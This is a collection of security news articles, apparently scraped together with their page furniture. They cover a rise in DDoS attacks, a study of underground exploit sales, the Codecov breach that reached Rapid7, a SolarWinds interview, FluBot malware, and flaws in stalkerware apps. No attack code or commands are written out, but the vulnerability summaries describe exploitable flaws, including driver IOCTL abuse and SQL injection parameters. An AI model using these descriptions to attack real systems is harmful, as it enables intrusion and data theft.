DDoS Attacks Up 31% in Q1 2021: Report

If pace continues, DDoS attack activity could surpass last year’s 10-million attack threshold.

Researchers recorded approximately 2.9 million DDoS attacks in the first quarter of 2021, marking a 31% increase from the same period in 2020.

Netscout’s Atlas Security Engineering & Response Team (ASERT) anticipated last year that the high DDoS numbers recorded in 2020 would extend into 2021. Now researchers report all three months of the first quarter surpassed the 900,000-attack mark. If this activity holds, they say, DDoS attack activity is set to exceed the 10-million attack threshold recorded last year.

This activity is unusual, the researchers say, as January and February are typically the slowest months for DDoS attacks. In 2021 they observed 972,000 attacks in January alone, beating last May’s record for the highest number of attacks seen in one month.

They note the size of DDoS attacks has “remained relatively flat.” with no large terabit attacks spotted. However, attackers seek new ways to make their attacks faster and harder to mitigate. Most (42%) DDoS attacks last five to 10 minutes; those spanning less than five minutes dropped from 24% to 19% of all DDoS attacks. Those with a longer duration stayed the same.

Healthcare organizations were hit with about 7,000 DDoS attacks in the third quarter of 2020, 10,000 in the fourth quarter, and 8,400 in the first quarter of this year, marking a 53% increase from the first quarter of 2020. Researchers also report a 41% increase in attacks targeting educational services over the past three quarters, with 45,000 in the first quarter of 2021 alone.

Read Netscout’s blog post for more details.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Recommended Reading:

More Insights

47% of Criminals Buying Exploits Target Microsoft Products

Researchers examine English- and Russian-language underground exploits to track how exploits are advertised and sold.

RSA Conference 2021 – Microsoft products accounted for 47% of the CVEs that cybercriminals request across underground forums, according to researchers who conducted a yearlong study into the exploit market.

The research spanned more than 600 English and Russian language forums, said Mayra Rosario Fuentes, senior threat researcher at Trend Micro, who presented some of the findings in her RSA Conference talk “Tales from the Underground: The Vulnerability Weaponization Lifecycle.” Researchers sought to learn which exploits were sold and requested, the types of sellers and buyers involved in transactions, and how their findings compared with their detection systems’.

Researchers scoured advertisements for the sales of exploits from January 2019 through December 2020. They learned Microsoft’s tools and services made up 47% of all requested CVEs on underground forums. Internet-connected products made up only 5%, “but with increased bandwidth of connected devices with the new 5G entering the market, IoT devices will become more vulnerable to cyberattack,” noted Fuentes in her talk.

More than half (52%) of exploits requested were less than two years old. Buyers were willing to pay an average of $2,000 (USD) for requested exploits; however, some offered up to $10,000 for zero-day exploits targeting Microsoft products.

Fuentes shared some examples of these exploit requests. One forum post requested help regarding an exploit for CVE-2019-1151, a Microsoft Graphics remote code execution (RCE) vulnerability that exists when the Windows font library improperly handles specially crafted embedded fonts. Another offered $2,000 for help in exploiting an RCE flaw in the Apache Web server.

When researching forum posts advertising exploits, researchers found 61% targeted Microsoft products. The highest percentage (31%) were for Microsoft Office, 15% were for Microsoft Windows, 10% were for Internet Explorer, and 5% were for Microsoft Remote Desktop Protocol. Fuentes noted exploits for Office and Adobe were most common in English language forums.  

A comparison of cybercriminals’ wish lists and sold exploits revealed parallels between the two categories, Fuentes pointed out.

“We noticed what was requested was very similar to what the market was offering,” she said. “Cybercriminals may have seen the requested items from users before deciding what items to offer on the market.”

Microsoft Word and Excel exploits “dominated” in both categories, Fuentes continued, digging into the broader Office category. Word and Excel made up 46% of exploits on criminals’ wish lists and 52% of exploits advertised on underground forums.

The Life Cycle of Underground Exploits
Fuentes discussed how exploits are developed and sold, starting from the beginning. An exploit may first be developed by an attacker, who sells it and it’s then used in the wild. From there, it is usually disclosed publicly and patched by the vendor. This may end the exploit’s life cycle, or it will continue to be offered for sale on Dark Web forums.

There are multiple types of sellers, she noted. An experienced seller with at least five years of experience might sell a couple of zero-day or one-day exploits per year with prices ranging from $10,000 to $500,000. Some sellers are disgruntled with bug bounty programs due to long response times or payouts lower than expected – Fuentes noted most people were happy with bug bounty experiences, but those who weren’t may sell exploits on underground forums.

Other “bounty sellers” may have cashed in on the maximum amount of bounty submissions for the year, or they may offer to buy exploits they can use to cash in on bug bounty programs. There are some who find exploits that other people developed and sell them as their own.

Some sellers advertise “exploit builder” subscription services ranging from $60 for one month, to $120 for three months, to $200 for six months. The packages include a range of different types of exploits, along with “free updates” and “full support” for criminal buyers, she noted.

While zero-days may fetch a higher price, many exploits sold on the underground targeted older systems. Researchers found 22% of exploits sold were more than three years old, and 48% of those requested were older than three years. The oldest vulnerability discovered was from 1999, Fuentes said, adding the average time to patch an Internet-facing system is 71 days.

Older vulnerabilities requested included CVE-2014-0133 in Red Hat and CVE-2015-6639 in Qualcomm. Those sold included Microsoft CVE-2017-11882, a 17-year-old memory corruption issue in Microsoft Office, along with Office vulnerability CVE-2012-0158 and CVE-2016-5195, a Linux kernel vulnerability dubbed Dirty Cow that sold for $3,000 on the underground, she said.

“The longevity of a valuable exploit is longer than most expect,” Fuentes said. “Patching yesterday’s vulnerability can be just as important as today’s critical one.”

Trend Micro will release a report with the full findings in a few weeks, she noted.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio

Recommended Reading:

More Insights

Rapid7 Is the Latest Victim of a Software Supply Chain Breach

Security vendor says attackers accessed some of its source code using a previously compromised Bash Uploader script from Codecov.

An unknown number of Rapid 7 customers — and Rapid7 itself — have become the latest victims of security incidents affecting trusted third-party software supply chain partners.

On Friday, Rapid7 disclosed that attackers had accessed some of its source code repositories via a third-party Bash Uploader from Codecov that the security vendor was using in its development environment.

The attackers had previously compromised the uploader and modified it so code and associated data from Rapid7 and other Codecov customer environments would be uploaded to an attacker-controlled server — in addition to Codecov’s own systems as intended.

Many companies use Codecov’s software to verify how effectively they are testing software in development for security and other issues. Codecov’s Bash Uploader script is used to upload certain data — containing credentials, tokens, or keys — from customer CI environments to its own servers.

In January 2021, an attacker gained access to the Bash Uploader by taking advantage of an error in Codecov’s Docker image creation process. According to Codecov, the configuration error allowed the attacker to extract a credential for modifying the Bash Uploader script. Codecov did not discover the modification until four months later, in April 2021.

During that period, the attacker used the modified Bash Uploader to access and export data from Codecov customer continuous integration (CI) environments to a remote server. Codecov described the compromised Bash Uploader as giving attackers the ability to potentially extract a range of information from CI environments, including credentials as well as any services, data stores, and application code associated with these credentials.

Rapid7 said that when it learned of the incident at Codecov, it initiated an internal response process to understand how the company might have been affected. The investigation showed that attackers had used the compromised Bash Uploader to access “a small subset” of source code related to tooling for the company’s managed detection and response (MDR) service.

“Those repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers,” Rapid7 said Friday.

Rapid7 described the use of Codecov’s Bash Uploader as being limited to a single CI server set up for its MDR service. As a result, no production environments or other corporate systems were accessed or modified the security vendor said. The small — but undisclosed — number of Rapid7 customers that may have been affected in the attack have all been notified and advised of mitigation measures, Rapid7 said.

Growing List
Rapid7 and its customers are the latest in a growing list of victims of software supply chain incidents in recent months. The most notable example remains the one that SolarWinds disclosed last December, which affected some 18,000 organizations worldwide. In that incident, a nation-state actor gained access to SolarWinds’ development environment and planted a backdoor in software that was later sent out as automatic updates of the company’s Orion network management technology. In another incident, an attacker compromised a near-obsolete file transfer technology from Accellion and used it to exfiltrate data from several large organizations.

Concerns over such incidents appear to have prompted President Biden to make software supply chain security a major focus of a new executive order on cybersecurity that he issued last week.

“Rapid7 is the latest in a string of companies to be severely impacted by security supply chain-related attacks,” says Kevin Dunne, president of Pathlock. “Security vendors are often high-value targets, as they have deep, trusted access to networks that can provide an effective Trojan horse for bad actors.”

Though the impact to Rapid7 customers seems minimal, they need to remain on high alert, Dunne says. He advocates they work closely with Rapid7’s incident response and support teams to make any necessary updates. “In the meantime,” he adds, “they should monitor activity on their network, applications, and devices to highlight any suspicious behavior coming from Rapid7’s software and mitigate any potential threats.”

Setu Kulkarni, vice president of strategy at Whitehat Security, says that based on current information, that impact on Rapid7’s customers appears minimal. Even so, it is curious that the company would keep MDR-related data in a code repo on a non-production server in the first place. “If it were, did it pass the security controls for data at rest?” Kulkarni asks. “Broadly, [the incident] does highlight why customer-related data should not be stored in code repos and, if anything, dummy anonymized data should be used for testing.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Recommended Reading:

More Insights

RSAC 2021: What Will SolarWinds' CEO Reveal?

In a keynote conversation with Forrester analyst Laura Koetzle, Sudhakar Ramakrishna will get candid about the historic breach.

(Image: MiaStendal via Adobe Stock)

(Image: MiaStendal via Adobe Stock)

Since the news broke in December, the name SolarWinds has become both a buzzword and cautionary tale everyone in the security industry continues to talk about it. It is to 2021 what Equifax was to 2017. So it’s no surprise that a keynote discussion that places SolarWinds CEO Sudhakar Ramakrishna in the hot seat is one of the most highly anticipated items on this week’s RSA Conference 2021 agenda.

In what is promised to be a candid discussion between Forrester analyst Laura Koetzle and Ramakrishna, the session, titled “SolarWinds: What Really Happened?,” will offer a view of the attack’s details: the what, how, and who of what went down – and what industry professionals might learn from the breach.

Dark Reading spoke to Koetzle in advance about what she’s anticipating to come out of the session and her view of the headline-making attack.

Dark Reading: Sudhakar Ramakrishna will be speaking with you about the results of a long investigation, his perspective around the attack, and specific learnings from the incident. For starters, what are you hoping attendees will gain from the session?
Koetzle: When RSA Conference asked me to interview Sudhakar for the keynote session, I agreed quite quickly. And then the next day I realized that much would depend on how candid Sudhakar was willing to be – and how open his legal and communications team were willing to let him be. Happily, Sudhakar and his team wanted to be as transparent as possible about the incident and everything that followed from it, which I’m hoping the members of the security community will both appreciate and emulate.

Our discussion should let attendees see the choices and pressures that SolarWinds faced from the inside so that they’re better prepared when they’re faced with a breach themselves. I’m also hoping that attendees will learn from the things that SolarWinds did well and from the things that they would do differently in hindsight.

Dark Reading: As an experienced security analyst who has been following high-profile incidents like SolarWinds for many years, how do you think the organization handled the fallout in the immediate days following the news? One of the headlines was about how a password issue was the result of an intern’s mistake. Some criticized that as a misstep. What is your take?
Koetzle: The “intern posts password in cleartext on GitHub” incident is tailor-made for finger-wagging headlines, and it also became a hot-button issue when Sudhakar and former SolarWinds CEO Kevin Thompson testified at a congressional hearing. Sudhakar and I will discuss this in our interview, because, one, the credentials the intern posted weren’t used in the breach, and some of the reporting at the time seemed to indicate that they had been, and, two, Sudhakar acknowledges that he and his colleagues didn’t handle that situation optimally.

Dark Reading: And with a new CEO at the helm, how do you think they continue to handle things now? Are there any takeaways from what you are observing that are helpful for other companies that may deal with a breach in the future?
Koetzle: As attendees will hear during the interview, Sudhakar was announced as the incoming CEO of SolarWinds on Dec. 9, 2020. That’s the day after FireEye announced it had been the victim of an attack but before anyone at SolarWinds knew about the compromise to SolarWinds Orion. Sudhakar didn’t take over as CEO until Jan. 4, 2021, when SolarWinds was about three weeks into its response to the breach. So Sudhakar walked into a high-profile incident response.

I was surprised and pleased by how candid Sudhakar and SolarWinds were willing to be for our interview, and the same goes for their response itself. They’ve released new information as they learned it throughout their response to help their customers and the security community, rather than repeating “No comment” until they felt like they had everything buttoned up. That transparency is something I’d encourage attendees and other companies responding to breaches to emulate.

Dark Reading: We are heading into this talk with the Colonial Pipeline attack now fresh in our minds. The last six months have brought us several attacks that have major implications on US national security and infrastructure. In Washington, lawmakers are discussing legislative fixes, and the Biden administration is talking about a new information-sharing system among private companies and the US government. What are your thoughts on some of what is being proposed?
Koetzle: Suffice it to say that more cybersecurity legislation and regulation is long overdue, so I welcome the attention to it. The Biden administration had been signaling its intent to prioritize spending to address cybersecurity risk in its first several weeks in office. I’m happy that they’re emphasizing the “unsexy but necessary” bits of information security practice, such as making sure that government agencies actually implement the best practices for identifying and managing risks that its own experts recommend; according to the GAO, none of the 23 agencies they’d reviewed had implemented those practices as of March 2021.

And as one of the members of the Forrester security research team who was present at the creation of the zero-trust approach back in 2009, I’m thrilled to see the US federal government is mandating the use of zero trust – because it works. I’m also happy to see that President Biden’s executive order requires that products provide a software bill of materials (SBOM), following the approach that the National Telecommunications and Information Administration (NTIA) at the US Department of Commerce has been coordinating with the software industry. Widespread implementation of SBOM will mean that companies and security professionals can know what’s really in the software products they buy and use.

Dark Reading: Now that we are six months out from when the news of SolarWinds first broke, what is your take on the lessons security and software vendors can learn from this breach?
Koetzle: I’ve already mentioned that I was impressed by SolarWinds’ commitment to transparency and its willingness to share what it has learned in its investigation; that’s a practice I’d suggest we all emulate. But for security and software vendors specifically, if you’ve succumbed to the temptation of producing opportunistic marketing – I’ve seen some egregious “Want to avoid a breach like SolarWinds had? Buy our software!” pitches, which I immediately toss in the virtual trash bin – please stop now. Most security professionals know that we’re all going to be the victims of an incident sometime. Today it’s SolarWinds, but tomorrow it could be you.

Dark Reading: Moving forward, what do you suggest CISOs and security managers focus on to establish or improve product security initiatives?
Koetzle: Many CISOs and other security professionals are accustomed to working in internal, enterprise security environments, and working on the security of the products that your company sells requires a different mindset. Strong product security requires working with product teams in the very early stages of development, which is more chaos than many security professionals are accustomed to.

If you’re working on product security, you’ll need to be comfortable with lots of uncertainty and to create risk management processes that accept high levels of risk at the early stages and encourage developers to reduce risk – and improve security – as they improve the product they’re building. “Minimum viable security” isn’t a phrase traditional security professionals use very often, but that’s the right way to think about the acceptable security level for a minimum viable product.

More details on the keynote discussion between Koetzle and Ramakrishna can be found here.

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online. View Full Bio

Recommended Reading:

More Insights

Latest Security News from RSAC 2021

Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database

PUBLISHED: 2021-05-17

An authentication brute-force protection mechanism bypass in telnetd in D-Link Router model DIR-842 firmware version 3.0.2 allows a remote attacker to circumvent the anti-brute-force cool-down delay period via a timing-based side-channel attack

PUBLISHED: 2021-05-17

Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware where IOCTL’s 0x80002014, 0x80002018 expose unrestricted disk read/write capabilities respectively. A non-privileged process can open a handle to .ZemanaAntiMalware, register with the driver using IOCTL 0x8000201…

PUBLISHED: 2021-05-17

Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware allows a non-privileged process to open a handle to .ZemanaAntiMalware, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook wit…

PUBLISHED: 2021-05-17

Intelbras Router RF 301K Firmware 1.1.2 is vulnerable to Cross Site Request Forgery (CSRF) due to lack of validation and insecure configurations in inputs and modules.

PUBLISHED: 2021-05-17

Intelbras Router RF 301K Firmware 1.1.2 is vulnerable to Cross Site Request Forgery (CSRF) due to lack of security mechanisms for token protection and unsafe inputs and modules.

Agility Broke AppSec. Now It's Going to Fix It.

Outnumbered 100 to 1 by developers, AppSec needs a new model of agility to catch up and protect everything that needs to be secured.

In today’s high-tech industries, security is struggling to keep up with rapidly changing production systems and the chaos that agile development introduces into workflows. Application security (AppSec) teams are fighting an uphill battle to gain visibility and control over their environments. Rather than invest their time in critical activities, teams are overwhelmed by gaps in visibility and tools to govern the process. As a result, many digital services remain improperly protected. To catch up, AppSec must adopt a model of agility that is compatible with software development.

The Case for Agility
The agile process continuously integrates small changes and collects meaningful feedback along the way, allowing an ever-progressing evolution of software. With small steps, you pay less for mistakes and learn a lot along the way. This approach, powered by continuous integration/continuous development (CI/CD), source code management (SCM), and an amazing array of collaboration tools, makes the software industry fast and powerful.

AppSec teams are charged with making sure software is safe. Yet, as the industry’s productivity multiplied, AppSec experienced shortages in resources to cover basics like penetration testing and threat modeling. The AppSec community developed useful methodologies and tools — but outnumbered 100 to 1 by developers, AppSec simply cannot cover it all.

Software security (like all software engineering) is a highly complex process built upon layers of time-consuming, detail-oriented tasks. To move forward, AppSec must develop its own approach to organize, prioritize, measure, and scale its activity.

What Would Agile AppSec Look Like?
Agile approaches and tools emerged from recognizing the limitations of longstanding approaches to software development. However, AppSec’s differences mean it can’t simply copy software development. For example, bringing automated testing into CI/CD might overlook significant things. First, every asset delivered outside CI/CD will remain untested and require alternative AppSec processes, potentially leading to unmanaged risk and shadow assets. Second, when developers question the quality of a report, it creates friction between engineers and security, jeopardizing healthy cooperation. This applies to every aspect of AppSec, not just testing.

We need to dig deeper, examine the tenets of agility, and define an approach that overcomes limitations and helps master the chaos.

1. Stakeholders, Deliverables, and Sustainability
AppSec teams’ attention is required at all layers of engineering, which often creates bottlenecks, even for teams with a clear focus. This motivates organizations to delegate security tasks to developers. Since AppSec is a resource-consuming discipline, delegating tasks is key to success. However, many organizations struggle with the complexity of ownership in AppSec. For example, automated security tools are merely guests in CI/CD and have varying levels of acceptance among developers, so things may fall between the cracks.

Furthermore, AppSec’s role includes directing the organization strategically. As maturity-focused initiatives like BSIMM and SAMM argue, collecting the right data and publishing it to the right stakeholders promotes security simultaneously from the bottom up and the top down.

To become agile, AppSec must own measurement and governance while delivering services in a way that encourages developers to pull security to the left. AppSec agility requires breaking dependencies in anything related to posture measurement and governance and establishing sustainable, independent operations that set their own strategy and tactics.

2. Discovering Requirements
The potential disruption caused by releasing new software in enterprises encourages product teams to avoid assumptions and learn what works for users; there’s a constant journey to discover requirements. While security requirements are clear on paper, with software proliferating so quickly, governance of the process becomes aspirational for most teams.

With regulatory and industry standards continuously evolving, AppSec must develop a rapidly agile ability to define the organization’s security priorities.

3. People, Processes, and Tools
Agile development requires the cooperation of motivated and empowered individuals. The tools that helped development outpace AppSec, such as Git for working simultaneously on code, Jira for tracking complex plans, and Jenkins for optimizing and standardizing build, test, and deploy, are instrumental to agility. They allow users to invest less on peripheral tasks and move faster while benefiting from the insightful data they hold.

While there is no replacement for having a professional security architect, a razor-sharp pen tester, and a properly armed bug hunter, there is great promise in automated security testing and runtime protection. Instrumental to AppSec agility are systems that reduce menial tasks and utilize data from one activity to make another more effective.

Better, scalable AppSec requires better intel collection, measurement metrics, and orchestration. Teams must be able to allocate their talent well, using prescriptive metrics to guide prioritization. AppSec teams should be able to immediately know what assets they are protecting and which are most important. By making more security services accessible to the organization and providing leadership with actionable measurements, teams will be able to embrace systematic processes such as validated learning and lead their organization to maturity.

From Agile to Mature
The time has come for AppSec to operate at the level of the field it protects. This is the only way for AppSec teams to effectively do their job while providing the speedy production that keeps boards happy. AppSec teams deserve clearer workflows, more automation, and true visibility. Software engineers have learned to master machines and make them our friends. It is high time that application security did the same. Frankly, it can no longer afford not to.

Chen Gour-Arie is the Chief Architect and Co-Founder of Enso Security. With over 15 years of hands-on experience in cybersecurity and software development, Chen demonstrably bolstered the software security of dozens of global enterprise organizations across multiple industry … View Full Bio

Recommended Reading:

More Insights

Name That Toon: Road Trip

Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database

PUBLISHED: 2021-05-17

The Portal Store module in Liferay Portal 7.0.0 through 7.3.5, and Liferay DXP 7.0 before fix pack 97, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 1 does not obfuscate the S3 store’s proxy password, which allows attackers to steal the proxy password via man-in-the-middle a…

PUBLISHED: 2021-05-17

Cross-site scripting (XSS) vulnerability in the Site module’s membership request administration pages in Liferay Portal 7.0.0 through 7.3.5, and Liferay DXP 7.0 before fix pack 97, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 1 allows remote attackers to inject arbitrary we…

PUBLISHED: 2021-05-17

Cross-site scripting (XSS) vulnerability in the Redirect module’s redirection administration page in Liferay Portal 7.3.2 through 7.3.5, and Liferay DXP 7.3 before fix pack 1 allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_redirect_web_internal_portlet_RedirectPor…

PUBLISHED: 2021-05-17

Cross-site scripting (XSS) vulnerability in the Asset module’s category selector input field in Liferay Portal 7.3.5 and Liferay DXP 7.3 before fix pack 1, allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortl…

PUBLISHED: 2021-05-17

Multiple SQL injection vulnerabilities in Liferay Portal 7.3.5 and Liferay DXP 7.3 before fix pack 1 allow remote authenticated users to execute arbitrary SQL commands via the classPKField parameter to (1) CommerceChannelRelFinder.countByC_C, or (2) CommerceChannelRelFinder.findByC_C.

Take action now – FluBot malware may be on its way

Why FluBot is a major threat for Android users, how to avoid falling victim, and how to get rid of the malware if your device has already been compromised

Android malware known as FluBot is continuing to cause mayhem across some European countries, and there is speculation that the bad actors behind it may decide to target other geographies, including the United States. Here’s why you should be vigilant, how FluBot operates, and how you can remove this Android nasty from your device.

It’s also worth noting that this advice will help you stay safe from other Android malware strains. In recent days, cybercriminals have begun to target Europeans with TeaBot (also known as Anatsa or Toddler), an Android malware family that uses exactly the same technique as FluBot to spread and to lure users into giving up their sensitive data. FluBot and TeaBot are detected by ESET products as variants of the Android/TrojanDropper.Agent family.

How FluBot operates

If a victim is lured by the attacker into the malicious campaign, their entire Android device becomes accessible to the scammer. This includes the potential to steal credit card numbers and access credentials to online banking accounts. To avoid removal, the attacker implements mechanisms to stop the built-in protection offered by the Android OS and stops many third-party security software packages from being installed, an action many users would take to remove malicious software.

The victim first receives an SMS message that impersonates a popular delivery logistics brand, such as FedEx, DHL, and Correos (in Spain). The call to action of the message is for the user to click a link in order to download and install an app that has the same familiar branding as the SMS message but is actually malicious and has the FluBot malware embedded within it. An example of the SMS message (in German) and the subsequent prompt to install the app can be seen below:

Once installed and granted the requested permissions, FluBot unleashes a plethora of functionality, including SMS spamming, the theft of credit card numbers and banking credentials, and spyware. The contact list is exfiltrated from the device and sent to servers under the control of the bad actor, providing them with additional personal information and enabling them to unleash further attacks on other potential victims. SMS messages and notifications from telecom carriers can be intercepted, browser pages can be opened, and overlays to capture credentials can be displayed.

The malicious app also disables Google Play Protect to avoid detection by the operating system’s built-in security. Also, due to the excessive permissions granted, the bad actor is able to block the installation of many third-party anti-malware solutions.

How to remove FluBot

A compromised device may need to have the malware removed manually. My colleague, Lukas Stefanko, has produced a short video with helpful instructions on how to remove this and any other malicious app:

If you receive an unknown or unexpected SMS message with a clickable link, refrain from clicking the link and instead remove the message. In the unfortunate scenario that the malware was installed on a device and banking or other activity has taken place since the installation took place, then contact the organizations concerned and immediately and block access and where necessary change passwords, remembering to make them unique and strong.

Whether this malware makes it to North America in any significant number or not, the functionality and the devastation already caused in Europe should heighten the call to action for all Android users – to watch out for suspicious messages and to install security software in order to prevent such extremely malicious apps from ever getting on their devices.

Android stalkerware threatens victims further and exposes snoopers themselves

ESET research reveals that common Android stalkerware apps are riddled with vulnerabilities that further jeopardize victims and expose the privacy and security of the snoopers themselves

Mobile stalkerware, also known as spouseware, is monitoring software silently installed by a stalker onto a victim’s device without the victim’s knowledge. Generally, the stalker needs to have physical access to a victim’s device so as to side-load the stalkerware. Because of this, stalkers are usually someone from the close family, social or work circles of their victims.

Based on our telemetry, stalkerware apps have become more and more popular in the last couple of years. In 2019 we saw almost five times more Android stalkerware detections than in 2018, and in 2020 there were 48% more than in 2019. Stalkerware can track the GPS location of a victim’s device, conversations, images, browser history and more. It also stores and transmits all this data, which is why we decided to forensically analyze how these apps handle the protection of the data.

Figure 1. Based on our detection telemetry, usage of Android stalkerware is increasing

For stalkerware vendors, to stay under the radar and avoid being flagged as stalkerware, their apps are in many cases promoted as providing protection to children, employees, or women, yet the word “spy” is used many times on their websites. Searching for these tools online isn’t difficult at all; you don’t have to browse underground websites. The screenshot below depicts perhaps the most unsavory example of a claim these apps monitor women for their safety.

Insecure transmission of user PII (CWE-200) Storing sensitive information on external media (CWE-922) Exposure of sensitive user information to unauthorized user (CWE-200) Server leak of stalkerware client information (CWE-200) Unauthorized data transmission from device to server Incorrect permission assignment for devices with superuser privileges (CWE-732) Insufficient verification of client uploaded data (CWE-345) Improper authorization of SMS commands (CWE-285) Bypass payment to access admin console (CWE-284) Command injection (CWE-926) Enforcing weak registration password (CWE-521) Missing proper password encryption (CWE-326) Victim data kept on server after account removal Leak of sensitive information during IPC communication (CWE-927) Partial access to admin console (CWE-285) Remote livestream of video and audio from victim device (CWE-284) Running as system application Source code and super admin credentials leak (CWE-200)

Figure 2. A stalkerware app’s claim to monitor women allegedly for their safety

More than 150 security issues in 58 Android stalkerware apps

If nothing else, stalkerware apps encourage clearly ethically questionable behavior, leading most mobile security solutions to flag them as undesirable or harmful. However, given that these apps access, gather, store, and transmit more information than any other app their victims have installed, we were interested in how well these apps protected that amount of especially sensitive data.

Hence, we manually analyzed 86 stalkerware apps for the Android platform, provided by 86 different vendors. In this analysis we define a person who installs and remotely monitors or controls stalkerware as a stalker. A victim is a targeted person that a stalker spies on via the stalkerware. Finally, an attacker is a third party whom the stalker and the victim are not usually aware of. An attacker can carry out actions such as exploiting security issues or privacy flaws in stalkerware or in its associated monitoring services.

This analysis identified many serious security and privacy issues that could result in an attacker taking control of a victim’s device, taking over a stalker’s account, intercepting the victim’s data, framing the victim by uploading fabricated evidence, or achieving remote code execution on the victim’s smartphone. Across 58 of these Android applications we discovered a total of 158 security and privacy issues that can have a serious impact on a victim; indeed, even the stalker or the app’s vendor may be at some risk.

Following our 90-day coordinated disclosure policy, we repeatedly reported these issues to the affected vendors. Unfortunately, to this day, only six vendors have fixed the issues we reported in their apps. Forty-four vendors haven’t replied and seven promised to fix their problems in an upcoming update, but still have not released patched updates as of this writing. One vendor decided not to fix the reported issues.

Discovered security and privacy issues

The 158 security and privacy issues in 58 stalkerware apps are ordered based on the prevalence of occurrences found in the analyzed stalkerware.

Figure 3. Breakdown of security and privacy issues uncovered in this research


The research should serve as a warning to potential future clients of stalkerware to reconsider using software against their spouses and loved ones, since not only is it unethical, but also might result in revealing the private and intimate information of their spouses and leave them at risk of cyberattacks and fraud. Since there could be a close relationship between stalker and victim, the stalker’s private information could also be exposed. During our research, we identified that some stalkerware keeps information about the stalkers using the app and gathered their victims’ data on a server, even after the stalkers requested the data’s deletion.

This is just a snapshot of what we found during our research and so we invite you to read the whole paper.

Rapid7 Source Code Accessed in Supply Chain Attack

An investigation of the Codecov attack revealed intruders accessed Rapid7 source code repositories containing internal credentials and alert-related data.

Security firm Rapid7 has confirmed attackers have accessed a subset of its source code, which contained internal credentials and alert-related data, following an investigation launched after the Codecov supply chain attack.

Codecov, which provides tools to verify how well software tests cover code in development, announced the attack on April 15. Attackers had modified its Bash Uploader Script to export sensitive data, including credentials, software tokens, and keys, Codecov said. It advised clients to create a list of credentials that its software could access and consider them compromised.

Rapid7 launched an incident response process. It notes its use of the Bash Uploader script was limited; it had been deployed on a continuous integration server used to test and build internal tooling for its managed detection and response (MDR) service.

The investigation revealed unauthorized attackers accessed “a small subset” of Rapid7 source code repositories for internal tooling for its MDR service. Repositories contained some internal credentials, which the company says have been rotated, as well as alert-related data for some of its MDR customers. No other corporate systems or production environments were accessed.

Affected clients have been notified.

Read Rapid7’s full blog post for more information.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Recommended Reading:

More Insights